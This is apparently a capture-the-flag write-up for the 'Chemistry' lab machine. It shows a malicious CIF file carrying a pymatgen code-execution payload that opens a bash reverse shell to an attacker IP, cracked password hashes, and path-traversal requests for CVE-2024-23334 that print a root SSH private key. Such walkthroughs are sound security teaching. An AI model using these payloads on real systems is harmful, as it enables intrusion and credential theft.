Chemistry
Last updated
Last updated
Chemistry is a easy linux machine created by . The pymatgen was used for analyzing cif file and is vulnerable to CVE-2024-23346, which gives us the app user shell. The database.db file contains username and hashes. Cracking them gives us the rosa shell. The port 8080 website is using aiohttp server which is vulnerable to CVE-2024-23334 LFI exploit and the id_rsa file is fetched using the LFI and root shell is gained.
Linux
Easy
20
19-10-2024
08-03-2025
Starting the nmap scan and found ssh and http services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.38
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-28 11:13 GMT
Nmap scan report for 10.10.11.38
Host is up (0.65s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.43 secondsThe website provides the service to analyze the CIF [ Crystallographic Information File ].
Registering will give us access to the dashboard where it has a input field to add the CIF file.
It is also providing the example file of .cif file. Downloading and uploading it gives us the below result.
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c 'sh -i >& /dev/tcp/10.10.16.19/8443 0>&1'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "The instance directory is present in the users home directory which contains the database.db.
$ ls
app.py
instance
static
templates
uploads
$ cd instance
$ ls
database.db Transfering the file using the python3 http server and wget to our system for enumeration.
$ which python3
/usr/bin/python3
$ python3 -m http.serverwget http://10.10.11.38:8000/database.db
--2025-03-01 05:17:48-- http://10.10.11.38:8000/database.db
Connecting to 10.10.11.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/octet-stream]
Saving to: ‘database.db’
database.db 100%[========================================================================================>] 20.00K 16.2KB/s in 1.2s
2025-03-01 05:17:51 (16.2 KB/s) - ‘database.db’ saved [20480/20480]The database.db is a sqlite3 database and opening it with sqlitebrowser.
file database.db
database.db: SQLite 3.x database, last written using SQLite version 3031001, file counter 130, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 130 sqlitebrowser database.dbThe database contains the two tables structure and user. The user table contains the list of users and password which is hashed.
awk 'NR > 1' user.csv > user.txt
awk -F ',' '{ print $2":"$3 }' user.txt > hashadmin:2861debaf8d99436a10ed6f75a252abf
app:197865e46b878d9e74a0346b6d59886a
rosa:63ed86ee9f624c7b14f1d4f43dc251a5
robert:02fcf7cfc10adc37959fb21f06c6b467
jobert:3dec299e06f7ed187bac06bd3b670ab2
carlos:9ad48828b0955513f7cf0f7f6510c8f8
peter:6845c17d298d95aa942127bdad2ceb9b
victoria:c3601ad2286a4293868ec2a4bc606ba3
tania:a4aa55e816205dc0389591c9f82f43bb
eusebio:6cad48078d0241cca9a7b322ecd073b3
gelacia:4af70c80b68267012ecdac9a7e916d18
fabian:4e5d71f53fdd2eabdbabb233113b5dc0
axel:9347f9724ca083b17e39555c36fd9007
kristel:6896ba7b11a62cacffbdaded457c6d92
test:cc03e747a6afbbcbf8be7668acfebee5
dexter:a125a6b2a71e23adc002ac7fbe1a1042
hi:49f68a5c8493ec2c0bf489821c21fc3b
lobotech:4599df31c8496e34dbe34c6615fc5991
lalala:9aa6e5f2256c17d2d430b100032b997chashcathashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 19 digests; 19 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
----- SNIP -----
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
a125a6b2a71e23adc002ac7fbe1a1042:dexter
9aa6e5f2256c17d2d430b100032b997c:lalala
9ad48828b0955513f7cf0f7f6510c8f8:carlos123
cc03e747a6afbbcbf8be7668acfebee5:test123
49f68a5c8493ec2c0bf489821c21fc3b:hi
6845c17d298d95aa942127bdad2ceb9b:peterparker
c3601ad2286a4293868ec2a4bc606ba3:victoria123
63ed86ee9f624c7b14f1d4f43dc251a5:unicorniosrosados
Approaching final keyspace - workload adjusted.
----- SNIP -----
Started: Sat Mar 1 05:50:01 2025
Stopped: Sat Mar 1 05:50:34 2025 Using the password unicorniosrosados we can ssh as rosa.
ssh rosa@10.10.11.38
rosa@10.10.11.38's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 01 Mar 2025 12:31:07 PM UTC
System load: 0.0
Usage of /: 84.6% of 5.08GB
Memory usage: 35%
Swap usage: 0%
Processes: 260
Users logged in: 0
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:7dee
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Mar 1 10:56:27 2025 from 10.10.14.84
rosa@chemistry:~$ Running netstat reveals many open ports.
rosa@chemistry:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9001 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN - Using curl in port 8080, the header shows the aiohttp/3.9.1.
rosa@chemistry:~$ curl -I http://localhost:8080
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5971
Date: Sat, 01 Mar 2025 12:45:21 GMT
Server: Python/3.9 aiohttp/3.9.1Git clone the repository in local machine because we cannot directly clone it into the rosa 's shell.
git clone https://github.com/wizarddos/CVE-2024-23334.git
Cloning into 'CVE-2024-23334'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 12 (delta 1), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (12/12), 5.08 KiB | 1.27 MiB/s, done.
Resolving deltas: 100% (1/1), done.Open the python http server and download it using wget.
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...rosa@chemistry:~$ wget http://10.10.16.19:8000/CVE-2024-23334/exploit.py
--2025-03-01 14:24:33-- http://10.10.16.19:8000/CVE-2024-23334/exploit.py
Connecting to 10.10.16.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1522 (1.5K) [text/x-python]
Saving to: ‘exploit.py’
exploit.py 100%[========================================================================================>] 1.49K 2.80KB/s in 0.5s
2025-03-01 14:24:36 (2.80 KB/s) - ‘exploit.py’ saved [1522/1522]Running the script to get the /root/.ssh/id_rsa file.
rosa@chemistry:~$ python3 exploit.py -u http://localhost:8080/assets -f /root/.ssh/id_rsa
[+] Attempt 0
Payload: /static/../root/.ssh/id_rsa
Status code: 404
[+] Attempt 1
Payload: /static/../../root/.ssh/id_rsa
Status code: 404
[+] Attempt 2
Payload: /static/../../../root/.ssh/id_rsa
Status code: 404
[+] Attempt 3
Payload: /static/../../../../root/.ssh/id_rsa
Status code: 200
Respose:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Exploit complete
rosa@chemistry:~$ Copy and paste the id_rsa into local machine file, remove the extra space from the private key because it will give the libcrypto error and change the permissions.
chmod 600 id_rsassh -i id_rsa root@10.10.11.38
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 01 Mar 2025 02:52:03 PM UTC
System load: 0.0
Usage of /: 72.8% of 5.08GB
Memory usage: 22%
Swap usage: 0%
Processes: 234
Users logged in: 1
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:3907
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Oct 11 14:06:59 2024
root@chemistry:~# The below video provides the PoC of Chemistry machine.
Searching the vulnerability for cif file leads us to CVE-2024-23346 arbitrary code execution vulnerability. The PoC is release on github where cif file is analyzedusing pymatgen, which is used for arbitrary code execution.
The user.txt file contains the user flag
The aiohttp 3.9.1 is vulnerable to CVE-2024-23334 LFI and wizarddos has published the github which contains the PoC and script to exploit the vulnerability.
The root.txt file contains the root flag
